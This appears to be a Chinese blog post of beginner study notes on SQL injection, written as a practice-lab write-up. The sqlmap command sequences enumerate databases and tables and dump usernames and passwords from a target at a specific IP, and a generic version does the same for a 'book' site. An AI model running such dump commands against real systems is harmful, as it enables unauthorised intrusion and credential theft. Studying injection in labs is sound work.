sql注入攻击的入门

最新推荐文章于 2024-07-24 16:11:19 发布
最新推荐文章于 2024-07-24 16:11:19 发布
阅读量346 收藏
点赞数
文章标签: 信息安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bigbigworld666/article/details/103950820
版权

学习笔记
1月12日

使用某攻防平台中的靶机对sql的布尔盲注的学习进行了验证

进入靶场环境,给出一个网站的页面。
首先寻找注入点,小白刚入门不是很会,所以注入点找了一会,就在通知里面,然后使用sqlmap来跑很快就搞定了

sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” --dbs
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” -D stormgroup --tables
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” -D stormgroup -T member --columns
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” -D stormgroup -T member -C name,password,status --dump

最后得到两个密码,解密后的密码登录系统就得到了Key

对web网站进行渗透思路
1.万能语法
2.通过sql注入 在url地址栏数日数据库的注入语法
3.暴力破解
4.burp抓包
5.xss、csrf

注入漏洞在owasp top10 排行第一

系统漏洞

sql注入:
sql注入漏洞就是后台对用户输入的内容没有做合法性的验证和判断,用户构造恶意的sql语法输入带入数据库,从而实现对数据库的操作

手工找漏洞:
经验:

1.找到注入点,如何找到注入点?  
参数值传递的方法:  
GET方法   
POST方法  
sql注入点:存在位置一定是一个动态页面,注入点一定是在参数的位置

学习内容:找到book网站的sql注入漏洞

盲注:是sql注入的一种,有两种方式:一种是布尔盲注,一种是时间盲注
方法:通过burpsuite抓包
信息收集:
数据库:mysql 5.0.12
语言:Php
系统:windows
中间件:PHP 5.4,Apache 2.4.23

爆库:
sqlmap.py -r 路径 --dbs
sqlmap.py -r 路径 -D 库名 --tables
sqlmap.py -r 路径 -D 库名 -T user --columns
sqlmap.py -r 路径 -D 库名 -T 表名 -C 列名,列名 --dump

在这里插入图片描述
在这里插入图片描述

sqlmap
1.python环境
2.sqlmap部署

任务:利用book的注入漏洞,拿到数据中的所有数据。

b1gW0r1d
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SQL]SQL注入-ASP漏洞全接触--入门
11-23 753
引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入是从正常的WW
sql注入之二次攻击
forwardss的博客
03-07 491
二次注入攻击 什么是二次注入? 二次注入是指已存储(数据库,文件)的用户输入被读取后再次进入到SQL查询语句中导致的注入。 二次注入是sql注入的一种,但是比普通sql注入利用更加困难,利用门槛更高。 普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。 二次注入原理 二次注入的原理,在第一次进行数据库插入数据的时候,仅仅只是使用了 add...
SQL注入的注入点找法
weixin_51519028的博客
07-18 8337
1,注入点首先观察搜索框的地址是否是有与数据库交互,例如html这种几乎是不存在注入的所以要先判断是否有交互。 2,交互点一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//www.xxx.com/index.php?id=1这种很大程度存在注入当然有些注入点不会这么一眼看出会有些比较复杂例如http://www.xxx.com:50006/index.php?x=home&c=View&a=index&aid=9 这样的地址其实也可能存在注入。......
sql注入中常见的报错信息
sun的博客
10-21 4685
sql注入是我们常见的ctf的web类型题目,因此我们在做这类题时经常会在页面上返回错误信息,因此熟悉一些常见的sql注入信息是很重要的,下面我介绍一些自己常遇到的mysql报错信息。 我们在页面上返回的错误信息不仅仅只有mysql返回的,可能还有服务器返回的,因此我仅仅对mysql返回的错误信息进行总结 . 1,报错信息 The used SELECT statements...
SQL注入之sqlmap入门教程_sqlmap注入
ewii12567的博客
04-10 564
原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
常见WEB漏洞原理分析
m0_59598029的博客
11-09 97
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
sql注入攻击与利用
MSB_WLAQ的博客
10-11 576
前言 本文叙述了在Mysql、MSsql、Oracle、PostgreSQL平台下的sql注入探测方式与利用,作为个人笔记,没有框架以及中间件的参与。 文章的内容并不全面,日后有接触新的方法会有补充。 探测方法 首先贴出增删改查的基本语句,加粗部分为用户可控: mysql: select item from table where valuelike db_value; select item1,item2 from table where '**value1'**like db_value
Oracle开发人员SQL注入攻击入门
10-11
《Oracle开发人员SQL注入攻击入门SQL注入是一种常见的网络安全攻击方式,主要针对使用SQL(结构化查询语言)的数据库系统,如Oracle。攻击者通过在应用的输入字段中插入恶意SQL代码,来欺骗服务器执行非预期的...
SQL注入攻防入门详解
11-12
3. 应用防火墙和WAF:配置适当的规则,拦截SQL注入攻击。 4. 教育和培训:提高开发人员的安全意识,避免编写易受攻击的代码。 总之,理解SQL注入的原理和危害是防止这类攻击的关键。通过采取合适的防御措施,结合...
渗透学习入门SQL注入
07-31
渗透学习入门SQL注入 SQL 注入是一种常见的Web 应用程序漏洞,攻击者通过构造恶意输入来访问或控制数据库中的数据。SQL 注入攻击通常发生在Web 应用程序使用用户输入来构建动态SQL 语句时,攻击者可以 inject ...
SQL注入攻击与防御
10-04
本书包含所有与SQL注入攻击相关的、当前已知的信息,凝聚了由本书作者组成的、无私奉献的SQL注入专家团队的所有深刻见解。  什么是SQL注入?理解它是什么以及它的基本原理  查找、确认和自动发现SQL注入  查找代码...
sql注入之新手入门示例详解
09-10
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有正确地过滤或转义这些输入,攻击者就能插入恶意的SQL语句,从而获取、修改、删除数据库中的敏感信息,甚至完全控制...
sql注入基础原理及注入方式
A906003660的博客
07-20 1192
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入的简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
sqlmap入门-判断注入点
weixin_46626737的博客
11-14 6896
①找到目标站,查看源代码,或者查找子链接,寻找可以尝试注入的参数,大多为$POST['a'],也有$GET['a'],当中a为可尝试注入的参数 还有比如点击子链接url中出现http://www.*****.com/****.php?a=1 出现http://www.******.com/*****.php?a=1&b=a等等 ②get型的注入命令,基本为python sqlmap.py(换到相应路径) -u "url" --level 1-5 ③post型的注入命令给,可以用brup...
SQL注入攻击(基础)
scholar_1的博客
07-08 1198
书生这次准备了一份sql注入攻击的靶场演练教程以封神台在线演练靶场为例(像游戏一样一关关过),就说第一章吧题目如下:要求是通过sql注入来获得管理员的密码点击传送门,出现这样一个网页:那么,第一步,确定目标,这里是: 接下来第二步,来判断这里是否存在SQL注入的漏洞开始操作: 看来,页面返回正常,接着下一个 看,页面返回不正常了,所以我判断,这里可能会存在一个SQL注入漏洞好,开始第三步,判断他有多少字段一步步来,从1开始试探 可以看到页面显示正常,接下来,测2 页面返回正常,然
SQL注入基础入门篇 注入思路及常见的SQL注入类型总结
好好睡觉
03-04 6868
SQL注入基础部分、注入脚本、常见注入类型分类、报错注入、联合查询思路
sqlmap自动的寻找注入点,
热门推荐
gwl7878的博客
07-08 1万+
Sqlmap Tricks for Advanced SQL Injection https://www.trustwave.com/Resources/SpiderLabs-Blog/Sqlmap-Tricks-for-Advanced-SQL-Injection/ 此文介绍的方法太过复杂: 简介/var/www/html/dvwa/vulnerabilities/sqli_blind/s
sqlmap自动扫描注入点_SQLmap指导手册
weixin_39532754的博客
11-22 2113
SQLmap指导手册一、前言sqlmap是一个开源的渗透测试工具,它自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。二、特点全力支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Acce...
web小项目-曼波生日录(Servlet+JSP+MySQL)
最新发布
m0_75138009的博客
07-24 852
当记录条数过多时会自动出现滚轮,数据不会超出紫框。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值